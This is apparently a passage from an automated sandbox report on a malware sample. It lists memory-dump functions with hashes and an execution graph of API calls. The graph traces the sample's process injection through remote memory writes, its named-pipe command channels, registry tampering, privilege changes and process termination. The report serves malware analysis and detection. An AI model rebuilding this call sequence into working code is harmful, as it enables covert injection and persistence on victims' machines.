                                                        • Instruction Fuzzy Hash: 4B61CD3A51AB44C6EB60CB55F46831A77A0F788F85F508125EE8D47BA8DF7CCA65CB00
                                                        Function 00000283E0F33504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812384683.00000283E0F20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000283E0F20000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f20000_dwm.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction ID: 93d66c2e65d0fdd51e67b0f601c429ccd5a942187cd79ffae651ac8b6137109c
                                                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction Fuzzy Hash: 5A11912AA12A1315FAE4D538E47D36911C07F58FB4F4CC638AD661A2D68E3CEA634300
                                                        Function 00000283E0F64104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction ID: 4f2d3ceffc172d6aaad6adb7ce043e9668ac0f252a675c880b115e2f2ddf1625
                                                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction Fuzzy Hash: 1111082AA41A4811FE26B528F43D36D0300FF6ABB4F08C635AD36072D78E34D6E34380
                                                        Function 00000283E0F2F040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812384683.00000283E0F20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000283E0F20000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f20000_dwm.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                        • API String ID: 3215553584-4202648911
                                                        • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                        • Instruction ID: 1e3b6778205cab800bb8527a2d8b1a1c4da6e2829a304bf8dfcaf4e997f0c59d
                                                        • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                        • Instruction Fuzzy Hash: DB61917E52264482FA65CB65D56C32A2AA0FF87F40F90C435DE06277E5DE38DA7B8300
                                                        Function 00000283E0F5AA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: CallEncodePointerTranslator
                                                        • String ID: MOC$RCC
                                                        • API String ID: 3544855599-2084237596
                                                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction ID: 52fd29891b234e18830e9679080f090cefba1e863fe7592bd016ea800ceea5f8
                                                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction Fuzzy Hash: 9E617D3B606B84CAEB14DFA5D45439D77A0FB44B88F048225EF4917B98DF38CAA6C740
                                                        Function 00000283E0F2A178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812384683.00000283E0F20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000283E0F20000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f20000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                        • String ID: csm$csm
                                                        • API String ID: 3896166516-3733052814
                                                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction ID: 49158f5618dbe85989e6d6cef41b8436b08fa93c2a870b885a8b215e603c67e5
                                                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction Fuzzy Hash: 4D517B3A106380CBEB64CB65946835877A0FF55F94F18C126DE9987AD5CF39DAB2CB00
                                                        Function 00000283E0F5AD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                        • String ID: csm$csm
                                                        • API String ID: 3896166516-3733052814
                                                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction ID: 2036f8b67b78a6e646e96170bbdd0f9521508464ecaa6122941a331d1906b2dc
                                                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction Fuzzy Hash: 1C518E7A1012818BEF64CBA6A4A835977A0FF54F85F18C125DE9947BD5CF38DAB2C700
                                                        Function 00000283E0F28405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812384683.00000283E0F20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000283E0F20000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f20000_dwm.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritable__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 3242871069-629598281
                                                        • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction ID: 5507c6b8200b817129c5a6fbc105ada593c1abb5673a0b83dbb049029ebeaabb
                                                        • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction Fuzzy Hash: BF51B03A7036008BEB14DB65E469B293795FB54FA8F58C134DE0643788EF38DA938704
                                                        Function 00000283E0F283E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812384683.00000283E0F20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000283E0F20000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f20000_dwm.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritable__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 3242871069-629598281
                                                        • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction ID: ebf19867171e506e4f829863c344b218e2eaa26d61d6f3b24f5ab0140d0a900a
                                                        • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction Fuzzy Hash: 1B318D3A203640D6E714DF61E86872977A4FB44FA8F19C124EE5A07B88DF38DA63C704
                                                        Function 00000283E0F62058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: FileWrite$ConsoleErrorLastOutput
                                                        • String ID:
                                                        • API String ID: 2718003287-0
                                                        • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                        • Instruction ID: c9aed5881a195e43da1cd142cf258220715838aea194b4ccaa87776f5522f47f
                                                        • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                        • Instruction Fuzzy Hash: 11D13436706A8489E751CFB5E4543DC3BB1FB64B98F108266CE4997B9ADE34C627C380
                                                        Function 00000283E0F514A4 Relevance: 6.3, APIs: 5, Instructions: 38memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Free
                                                        • String ID:
                                                        • API String ID: 3168794593-0
                                                        • Opcode ID: 637b04ff62da02b8b8c355a0b12521a64aeb4c7988103f0530a9550870a0a79b
                                                        • Instruction ID: 38b38595ad8cb18c32b64fb8dbb295feee759798c411bf23176fdd5e5311838d
                                                        • Opcode Fuzzy Hash: 637b04ff62da02b8b8c355a0b12521a64aeb4c7988103f0530a9550870a0a79b
                                                        • Instruction Fuzzy Hash: DB018C7A602A99C6E704DF62F81814E63A1FB8AF81F048035EE4943719DF38D662C780
                                                        Function 00000283E0F62980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: ConsoleErrorLastMode
                                                        • String ID:
                                                        • API String ID: 953036326-0
                                                        • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                        • Instruction ID: 637300db09437b53cff7fc3c88aed9f4759036844da0d9be85937d283e962749
                                                        • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                        • Instruction Fuzzy Hash: 43912A7A702E5885F7A0DF65A4683AD3BA0FB64F88F14C169DE0A57685DF34C663C380
                                                        Function 00000283E0F57960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                        • String ID:
                                                        • API String ID: 2933794660-0
                                                        • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                        • Instruction ID: 87b7886e8bd102c2f43a83455ad64e9576e77645f64e99f1df24dfde220983cf
                                                        • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                        • Instruction Fuzzy Hash: 2C112126711F058AEB00CF64F8693AC33A4F719B58F441E31DE6D46794DF78C2A98380
                                                        Function 00000283E0F5253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                        • Instruction ID: fd1257d598bfd132c5f9f2942076048bf2f5a76cb42ef43dd722281242a30cbc
                                                        • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                        • Instruction Fuzzy Hash: 8D71073A20178141EFA5DFE9A8683A96790FB9AF84F448235DD0953B88DF34CF52C700
                                                        Function 00000283E0F29E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812384683.00000283E0F20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000283E0F20000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f20000_dwm.jbxd
                                                        Similarity
                                                        • API ID: CallTranslator
                                                        • String ID: MOC$RCC
                                                        • API String ID: 3163161869-2084237596
                                                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction ID: 4eb179526bd77865a26b3d820aedc2aab7c678922c12797806a8ecb9684fdea2
                                                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction Fuzzy Hash: B3618E3B606B848AEB20DF65D45439D77A0FB48F88F048625EF4917B99DF38D6A6C700
                                                        Function 00000283E0F52330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                        • Instruction ID: a9f0133d41d0d228be6ec06c1aa0a3e3186ae70ebb8d60e1de791dff854b27ec
                                                        • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                        • Instruction Fuzzy Hash: 30510A3A20678141EEA5CAE9A07C36A6751FBA6F40F448235DD4903B4ADE39CF27C740
                                                        Function 00000283E0F626F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastWrite
                                                        • String ID: U
                                                        • API String ID: 442123175-4171548499
                                                        • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                        • Instruction ID: f66aa5a089738768f42d768ca52fc4165fdf5837331f264d38b5cb1d7558303f
                                                        • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                        • Instruction Fuzzy Hash: 8841A276616A8482DB60DF25F8587AD67A0FB98B94F448031EE4D87794DF3CC652C780
                                                        Function 00000283E0F594A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFileHeaderRaise
                                                        • String ID: csm
                                                        • API String ID: 2573137834-1018135373
                                                        • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                        • Instruction ID: 10dab0dbe0d866a7a504ba6f5cfa1d3c6f2f125a8ce7fe2dc7f59effd429f855
                                                        • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                        • Instruction Fuzzy Hash: 90112B3621AB8482EB65CB15F45435977E5FB88F94F588224EE8C07758EF3CCA62CB40
                                                        Function 00000283E0F27356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812384683.00000283E0F20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000283E0F20000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f20000_dwm.jbxd
                                                        Similarity
                                                        • API ID: __std_exception_copy
                                                        • String ID: ierarchy Descriptor'$riptor at (
                                                        • API String ID: 592178966-758928094
                                                        • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                        • Instruction ID: 19036c8eb49a69913a7b84f8cf4a2f8ce2b50df7a00b8f34d4accafcd1f8e2b9
                                                        • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                        • Instruction Fuzzy Hash: 8BE04F61642B48D0DB018F61E85429833A0AB98F64B58D1229D5C06311EA3CD2FAC300
                                                        Function 00000283E0F273B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812384683.00000283E0F20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000283E0F20000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f20000_dwm.jbxd
                                                        Similarity
                                                        • API ID: __std_exception_copy
                                                        • String ID: Locator'$riptor at (
                                                        • API String ID: 592178966-4215709766
                                                        • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                        • Instruction ID: bd845fa433a597fe5a53f3b145a4a539bf31b9f4464573d0fb0a28a00d6a336c
                                                        • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                        • Instruction Fuzzy Hash: E7E04F61602B48C0DB018F61D4502986360AB98F64B88D122CD4C06311EA3CD2E6C300
                                                        Function 00000283E0F51BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID:
                                                        • API String ID: 756756679-0
                                                        • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                        • Instruction ID: f84b5b760ee03c72493453056a8e348c52b4e63ccdb7a77c19520233936ac078
                                                        • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                        • Instruction Fuzzy Hash: 89119129602B4481EE44DBA6A81C26973A1FF89FC0F188038DE4D83766DF39D963D340
                                                        Function 00000283E0F51268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1617791916-0
                                                        • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                        • Instruction ID: a108fc7276635cc9c5bf77220be23e4a0a35c7081bde076d44722fef64797e29
                                                        • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                        • Instruction Fuzzy Hash: D8E039B960260986EB04CB62E82834A37E1FB8AF06F04C0248D0947351DF7DC5AAD790

                                                        Execution Graph

                                                        Execution Coverage:48.4%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:226
                                                        Total number of Limit Nodes:22
                                                        execution_graph 384 140002b38 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 385 140002b8e K32EnumProcesses 384->385 386 140002beb SleepEx 385->386 387 140002ba3 385->387 386->385 387->386 389 140002540 387->389 390 140002558 389->390 391 14000254d 389->391 390->387 393 1400010c0 391->393 431 1400018ac OpenProcess 393->431 396 1400014ba 396->390 397 140001122 OpenProcess 397->396 398 14000113e OpenProcess 397->398 399 140001161 K32GetModuleFileNameExW 398->399 400 1400011fd NtQueryInformationProcess 398->400 401 1400011aa CloseHandle 399->401 402 14000117a PathFindFileNameW lstrlenW 399->402 403 1400014b1 CloseHandle 400->403 404 140001224 400->404 401->400 406 1400011b8 401->406 402->401 405 140001197 StrCpyW 402->405 403->396 404->403 407 140001230 OpenProcessToken 404->407 405->401 406->400 408 1400011d8 StrCmpIW 406->408 407->403 409 14000124e GetTokenInformation 407->409 408->403 408->406 410 1400012f1 409->410 411 140001276 GetLastError 409->411 412 1400012f8 CloseHandle 410->412 411->410 413 140001281 LocalAlloc 411->413 412->403 418 14000130c 412->418 413->410 414 140001297 GetTokenInformation 413->414 415 1400012df 414->415 416 1400012bf GetSidSubAuthorityCount GetSidSubAuthority 414->416 417 1400012e6 LocalFree 415->417 416->417 417->412 418->403 419 14000139b StrStrA 418->419 420 1400013c3 418->420 419->418 421 1400013c8 419->421 420->403 421->403 422 1400013f3 VirtualAllocEx 421->422 422->403 423 140001420 WriteProcessMemory 422->423 423->403 424 14000143b 423->424 436 14000211c 424->436 426 14000145b 426->403 427 140001478 WaitForSingleObject 426->427 430 140001471 CloseHandle 426->430 429 140001487 GetExitCodeThread 427->429 427->430 429->430 430->403 432 14000110e 431->432 433 1400018d8 IsWow64Process 431->433 432->396 432->397 434 1400018f8 CloseHandle 433->434 435 1400018ea 433->435 434->432 435->434 439 140001914 GetModuleHandleA 436->439 440 140001934 GetProcAddress 439->440 441 14000193d 439->441 440->441 442 140002bf8 443 140002c05 442->443 445 140002c25 ConnectNamedPipe 443->445 446 140002c1a Sleep 443->446 453 140001b54 AllocateAndInitializeSid 443->453 447 140002c83 Sleep 445->447 448 140002c34 ReadFile 445->448 446->443 450 140002c8e DisconnectNamedPipe 447->450 449 140002c57 448->449 448->450 460 140002524 449->460 450->445 454 140001bb1 SetEntriesInAclW 453->454 455 140001c6f 453->455 454->455 456 140001bf5 LocalAlloc 454->456 455->443 456->455 457 140001c09 InitializeSecurityDescriptor 456->457 457->455 458 140001c19 SetSecurityDescriptorDacl 457->458 458->455 459 140001c30 CreateNamedPipeW 458->459 459->455 461 140002531 460->461 462 140002539 WriteFile 460->462 463 1400010c0 30 API calls 461->463 462->450 463->462 464 140002258 467 14000226c 464->467 491 140001f2c 467->491 470 140001f2c 14 API calls 471 14000228f GetCurrentProcessId OpenProcess 470->471 472 140002321 FindResourceExA 471->472 473 1400022af OpenProcessToken 471->473 476 140002341 SizeofResource 472->476 477 140002261 ExitProcess 472->477 474 1400022c3 LookupPrivilegeValueW 473->474 475 140002318 CloseHandle 473->475 474->475 478 1400022da AdjustTokenPrivileges 474->478 475->472 476->477 479 14000235a LoadResource 476->479 478->475 480 140002312 GetLastError 478->480 479->477 481 14000236e LockResource GetCurrentProcessId 479->481 480->475 505 1400017ec GetProcessHeap HeapAlloc 481->505 483 14000238b RegCreateKeyExW 484 140002489 CreateThread GetProcessHeap HeapAlloc CreateThread CreateThread 483->484 485 1400023cc ConvertStringSecurityDescriptorToSecurityDescriptorW 483->485 486 14000250f SleepEx 484->486 487 1400023f4 RegSetKeySecurity LocalFree 485->487 488 14000240e RegCreateKeyExW 485->488 486->486 487->488 489 140002448 GetCurrentProcessId RegSetValueExW RegCloseKey 488->489 490 14000247f RegCloseKey 488->490 489->490 490->484 492 140001f35 StrCpyW StrCatW GetModuleHandleW 491->492 493 1400020ff 491->493 492->493 494 140001f86 GetCurrentProcess K32GetModuleInformation 492->494 493->470 495 1400020f6 FreeLibrary 494->495 496 140001fb6 CreateFileW 494->496 495->493 496->495 497 140001feb CreateFileMappingW 496->497 498 140002014 MapViewOfFile 497->498 499 1400020ed CloseHandle 497->499 500 1400020e4 CloseHandle 498->500 501 140002037 498->501 499->495 500->499 501->500 502 140002050 lstrcmpiA 501->502 504 14000208e 501->504 502->501 503 140002090 VirtualProtect VirtualProtect 502->503 503->500 504->500 511 1400014d8 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 505->511 507 140001885 GetProcessHeap HeapFree 508 140001830 508->507 509 140001851 OpenProcess 508->509 509->508 510 140001867 TerminateProcess CloseHandle 509->510 510->508 512 140001565 511->512 513 14000162f GetProcessHeap RtlFreeHeap GetProcessHeap RtlFreeHeap 511->513 512->513 514 14000157a OpenProcess 512->514 516 14000161a CloseHandle 512->516 517 1400015c9 ReadProcessMemory 512->517 513->508 514->512 515 140001597 K32EnumProcessModules 514->515 515->512 515->516 516->512 517->512 518 1400021d0 519 1400021dd 518->519 520 140001b54 6 API calls 519->520 521 1400021f2 Sleep 519->521 522 1400021fd ConnectNamedPipe 519->522 520->519 521->519 523 140002241 Sleep 522->523 524 14000220c ReadFile 522->524 525 14000224c DisconnectNamedPipe 523->525 524->525 526 14000222f 524->526 525->522 526->525 527 140002560 528 140002592 527->528 529 14000273a 527->529 530 1400026c6 GetProcessHeap HeapAlloc K32EnumProcesses 528->530 531 140002598 528->531 532 140002748 529->532 533 14000297e ReadFile 529->533 534 140002633 530->534 536 140002704 530->536 537 1400025a5 531->537 538 1400026bd ExitProcess 531->538 539 140002751 532->539 540 140002974 532->540 533->534 535 1400029a8 533->535 535->534 548 1400018ac 3 API calls 535->548 536->534 550 1400010c0 30 API calls 536->550 544 1400025ae 537->544 545 140002660 RegOpenKeyExW 537->545 541 140002919 539->541 542 14000275c 539->542 543 14000175c 22 API calls 540->543 549 140001944 ReadFile 541->549 546 140002761 542->546 547 14000279d 542->547 543->534 544->534 560 1400025cb ReadFile 544->560 551 1400026a1 545->551 552 14000268d RegDeleteValueW 545->552 546->534 609 14000217c 546->609 612 140001944 547->612 553 1400029c7 548->553 555 140002928 549->555 550->536 596 1400019c4 SysAllocString SysAllocString CoInitializeEx 551->596 552->551 553->534 564 1400029db GetProcessHeap HeapAlloc 553->564 565 140002638 553->565 555->534 567 140001944 ReadFile 555->567 559 1400026a6 604 14000175c GetProcessHeap HeapAlloc 559->604 560->534 562 1400025f5 560->562 562->534 574 1400018ac 3 API calls 562->574 570 1400014d8 13 API calls 564->570 576 140002a90 4 API calls 565->576 566 1400027b4 ReadFile 566->534 571 1400027dc 566->571 572 14000293f 567->572 587 140002a14 570->587 571->534 577 1400027e9 GetProcessHeap HeapAlloc ReadFile 571->577 572->534 578 140002947 ShellExecuteW 572->578 580 140002614 574->580 576->534 582 14000290b GetProcessHeap 577->582 583 14000282d 577->583 578->534 580->534 580->565 586 140002624 580->586 581 140002a49 GetProcessHeap 584 140002a52 HeapFree 581->584 582->584 583->582 588 140002881 lstrlenW GetProcessHeap HeapAlloc 583->588 589 14000285e 583->589 584->534 590 1400010c0 30 API calls 586->590 587->581 636 1400016cc 587->636 630 140002a90 CreateFileW 588->630 589->582 616 140001c88 589->616 590->534 597 140001a11 CoInitializeSecurity 596->597 598 140001b2c SysFreeString SysFreeString 596->598 599 140001a59 